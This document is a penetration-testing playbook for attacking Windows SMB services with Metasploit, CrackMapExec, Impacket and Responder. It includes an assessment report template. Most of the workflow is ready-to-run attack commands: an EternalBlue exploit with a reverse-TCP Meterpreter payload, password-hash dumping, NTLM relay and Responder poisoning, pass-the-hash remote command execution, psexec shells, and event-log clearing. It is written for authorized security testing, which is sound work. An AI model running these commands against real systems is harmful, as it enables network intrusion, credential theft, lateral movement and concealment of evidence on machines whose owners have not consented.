Exploiting SMB Vulnerabilities with Metasploit

When to Use

• Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
• Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
• Validating that patch management processes have addressed known SMB vulnerabilities
• Assessing SMB signing enforcement and share permission configurations across the domain
• Testing network segmentation by attempting SMB exploitation across VLAN boundaries

Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

Prerequisites

• Metasploit Framework 6.x installed (

  msfconsole --version

  )
• Authorized penetration test scope document listing target IP ranges and approved attack types
• Network access to target SMB services (TCP 445, TCP 139)
• CrackMapExec and Impacket tools installed for complementary SMB testing
• Valid test credentials or credential wordlists approved for the engagement
• Kali Linux or equivalent testing platform

Workflow

Step 1: Enumerate SMB Services and Versions

# Discover hosts with SMB open using Nmap
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Use CrackMapExec for rapid SMB enumeration
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Check SMB signing status (disabled = vulnerable to relay)
crackmapexec smb 10.10.0.0/24 --smb-signing

# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares

Step 2: Scan for Known SMB Vulnerabilities

# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run

# Scan for MS08-067 (Conficker vulnerability)
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run

# Check for SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527)
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare

Step 3: Exploit EternalBlue (MS17-010)

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit

# Post-exploitation -- verify access level
meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump

Step 4: Perform SMB Relay Attack

# Identify hosts without SMB signing (from Step 1)
# Set up NTLM relay with Impacket
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing
# From Meterpreter session on a compromised host:
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit

# Use responder to capture NTLM hashes for offline cracking
sudo responder -I eth0 -wrfv

Step 5: Pass-the-Hash and Lateral Movement via SMB

# Extract hashes from compromised system
meterpreter> hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Use pass-the-hash with CrackMapExec
crackmapexec smb 10.10.0.0/24 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

# Use Impacket psexec for interactive shell
impacket-psexec Administrator@10.10.5.30 \
  -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use Metasploit psexec module
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit

Step 6: Document Findings and Clean Up

# Document all compromised systems and access levels
# In Meterpreter, screenshot desktops for evidence
meterpreter> screenshot

# List accessible shares and sensitive data
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up -- remove any artifacts
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6> sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"

Key Concepts

Term	Definition
EternalBlue (MS17-010)	Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers
SMB Signing	Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts
Pass-the-Hash	Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash
NTLM Relay	Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user
PsExec	Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM
Null Session	Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems

Tools & Systems

• Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
• CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
• Impacket: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
• Responder: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
• enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

Common Scenarios

Scenario: Internal Penetration Test Targeting Windows Domain via SMB

Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.

Approach:

1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
7. Document the complete attack chain showing how one unpatched system led to full domain compromise

Pitfalls:

• EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
• Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
• Performing hashdump on domain controllers with large databases can cause performance degradation
• Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available

Output Format

## SMB Vulnerability Assessment Report

**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187

### Critical Findings

**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1

**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy

**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)